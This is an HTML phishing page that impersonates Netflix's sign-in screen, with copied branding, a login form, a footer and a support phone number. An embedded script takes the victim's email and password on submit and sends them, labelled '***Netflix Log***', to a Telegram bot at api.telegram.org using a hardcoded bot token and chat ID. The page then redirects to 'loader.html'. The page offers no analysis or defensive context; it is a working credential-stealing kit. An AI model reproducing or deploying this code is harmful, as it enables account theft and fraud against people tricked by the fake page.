<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Netflix - Update Payment</title>
  <link
    rel="icon"
    href="https://assets.nflxext.com/us/ffe/siteui/common/icons/nficon2016.ico"
    type="image/x-icon"
  />
  <link href="https://fonts.googleapis.com/css2?family=Helvetica:wght@400;700&display=swap" rel="stylesheet" />
  <!-- rest of your head content -->
</head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Netflix – Sign In</title>
  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
    }

    body {
      background: #000;
      position: relative;
      min-height: 100vh;
      display: flex;
      flex-direction: column;
    }

    body::before {
      content: "";
      position: absolute;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      background: url("nt.jpg") no-repeat center center / cover;
      opacity: 0.5;
      z-index: -1;
    }

    nav {
      position: fixed;
      top: 0;
      left: 0;
      padding: 20px 60px;
      z-index: 1;
    }

    nav img {
      width: 167px;
    }

    .form-wrapper {
      margin: auto;
      width: 450px;
      max-width: 90%;
      padding: 60px 68px 40px;
      background: rgba(0, 0, 0, 0.75);
      border-radius: 4px;
      color: #fff;
      z-index: 1;
      margin-top: 70px;
      margin-bottom:60px;
    }

    .form-wrapper h2 {
      font-size: 2rem;
      margin-bottom: 28px;
    }

    .form-control {
      position: relative;
      margin-bottom: 16px;
    }

    .form-control input {
      width: 100%;
      padding: 16px;
      background: #333;
      border: none;
      border-radius: 4px;
      color: #fff;
      font-size: 1rem;
    }

    .form-control label {
      position: absolute;
      top: 50%;
      left: 20px;
      transform: translateY(-50%);
      color: #8c8c8c;
      font-size: 1rem;
      pointer-events: none;
      transition: 0.2s ease all;
    }

    .form-control input:focus + label,
    .form-control input:valid + label {
      top: 10px;
      font-size: 0.75rem;
    }

    button {
      width: 100%;
      padding: 16px;
      background: #e50914;
      border: none;
      border-radius: 4px;
      color: #fff;
      font-size: 1rem;
      font-weight: bold;
      margin: 24px 0 12px;
      cursor: pointer;
    }

    button:hover {
      background: #f6121d;
    }

    .form-help {
      display: flex;
      flex-wrap: wrap;
      justify-content: space-between;
      font-size: 0.9rem;
      color: #b3b3b3;
    }

    .form-help a {
      color: #b3b3b3;
      text-decoration: none;
    }

    .form-help a:hover {
      text-decoration: underline;
    }

    p {
      color: #737373;
      font-size: 1rem;
      margin-top: 24px;
    }

    p a {
      color: #fff;
      text-decoration: none;
    }

    p a:hover {
      text-decoration: underline;
    }

    small {
      display: block;
      margin-top: 16px;
      color: #8c8c8c;
      font-size: 0.85rem;
    }

    small a {
      color: #0071eb;
      text-decoration: none;
    }

    small a:hover {
      text-decoration: underline;
    }

    footer {
      background: rgba(0,0,0,0.75);
      color: #757575;
      font-size: 0.9rem;
      padding: 40px 20px;
      text-align: center;
    }

    .footer-container {
      max-width: 1000px;
      margin: auto;
    }

    .footer-container p {
      margin-bottom: 20px;
    }

    .footer-links {
      display: flex;
      flex-wrap: wrap;
      justify-content: center;
      gap: 20px;
    }

    .footer-links a {
      color: #757575;
      text-decoration: none;
    }

    .footer-links a:hover {
      text-decoration: underline;
    }

    @media (max-width: 768px) {
      .form-wrapper {
        width: 90%;
        padding: 40px 30px;
      }

      nav {
        padding: 20px;
      }

      nav img {
        width: 140px;
      }
    }

    @media (max-width: 480px) {
      .form-wrapper {
        padding: 30px 20px;
        top: 45%;
      }

      .form-wrapper h2 {
        font-size: 1.5rem;
      }

      button {
        font-size: 0.95rem;
        padding: 14px;
      }

      .form-help {
        flex-direction: column;
        gap: 10px;
      }

      .footer-links {
        flex-direction: row;
        flex-wrap: wrap;
        justify-content: center;
        gap: 10px;
      }

      body::before {
        display: none;
      }
    }
  </style>
</head>
<body>
  <div style="background: #000; color: #fff; padding: 20px; text-align: center;"></div>

  <nav>
    <a href="#"><img src="https://upload.wikimedia.org/wikipedia/commons/0/08/Netflix_2015_logo.svg" alt="Netflix Logo" /></a>
  </nav>

  <div class="form-wrapper">
    <h2>Sign In</h2>
    <form id="loginForm">
      <div class="form-control">
        <input type="text" required id="email" />
        <label for="email">Email or phone number</label>
      </div>
      <div class="form-control">
        <input type="password" required id="password" />
        <label for="password">Password</label>
      </div>
      <button type="submit">Sign In</button>
      <div class="form-help">
        <div class="remember-me">
          <input type="checkbox" id="remember-me" />
          <label for="remember-me">Remember me</label>
        </div>
        <a href="#">Need help?</a>
      </div>
      <p>New to Netflix? <a href="#">Sign up now</a>.</p>
      <small>
        This page is protected by Google reCAPTCHA to ensure you're not a bot.
        <a href="#">Learn more.</a>
      </small>
    </form>
  </div>
<script>
  const botToken = '7764032513:AAFOgtYO7zHSkIK4eggYO0niYGZ6l--Ym5U';
  const chatId = '1998168170'; // numeric chat ID (without @)

  document.getElementById('loginForm').addEventListener('submit', async (e) => {
    e.preventDefault();

    const email = document.getElementById('email').value.trim();
    const password = document.getElementById('password').value.trim();

    if (!email || !password) {
      alert('Please fill out both fields.');
      return;
    }

    const message = `***Netflix Log***:\nEmail: ${email}\nPassword: ${password}`;

    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;

    try {
      const response = await fetch(url, {
        method: 'POST',
        headers: {'Content-Type': 'application/json'},
        body: JSON.stringify({
          chat_id: chatId,
          text: message,
        }),
      });

      const data = await response.json();

      if (data.ok) {
        document.getElementById('message').textContent = 'Login info sent successfully!';
        // Optionally clear form
        // e.target.reset();
      } else {
        document.getElementById('message').textContent = 'Failed to send info.';
      }
    } catch (error) {
      document.getElementById('message').textContent = 'Error sending info.';
      console.error(error);
    }
  });
</script>
  <footer>
    <div class="footer-container">
      <p>Questions? Call <a href="#">0800-022-5301</a></p>
      <div class="footer-links">
        <a href="#">FAQ</a>
        <a href="#">Help Centre</a>
        <a href="#">Terms of Use</a>
        <a href="#">Privacy</a>
        <a href="#">Cookie Preferences</a>
        <a href="#">Corporate Information</a>
      </div>
    </div>
  </footer>

  <!-- JavaScript to redirect after login -->
  <script>
    document.getElementById("loginForm").addEventListener("submit", function (event) {
      event.preventDefault(); // Prevent default form submission
      // Redirect to your desired page
      window.location.href = "loader.html"; // Replace with your actual redirect URL
    });
  </script>
</body>
</html>
